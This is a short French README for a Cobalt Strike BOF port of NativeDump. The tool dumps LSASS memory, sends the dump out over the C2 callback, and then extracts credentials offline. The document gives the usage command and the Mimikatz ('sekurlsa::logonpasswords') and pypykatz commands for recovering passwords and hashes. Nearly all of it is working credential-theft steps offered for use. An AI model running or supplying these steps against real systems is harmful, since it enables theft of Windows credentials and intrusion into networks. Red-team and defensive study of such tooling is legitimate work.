
BOF Cobalt Strike qui crée un minidump LSASS en mémoire et l'exfiltre via le callback C2 pour l'analyse hors ligne des identifiants avec Mimikatz ou pypykatz.
Portage BOF de l'outil https://github.com/ricardojoserf/NativeDump écrit par @ricardojoserf.
Importez NtDump.cna et exécutez :
ntdump <filename>
Le fichier minidump sera créé en mémoire et téléchargé à l'aide de CALLBACK_FILE et CALLBACK_FILE_WRITE. Une fois téléchargé, le fichier sera visible dans View -> Download.
Il peut ensuite être analysé à l'aide de Mimikatz
mimikatz # sekurlsa::minidump <file path to downloaded minidump file>
mimikatz # sekurlsa::logonpasswords full
Ou avec pypykatz
pypykatz lsa minidump <file path to downloaded minidump file>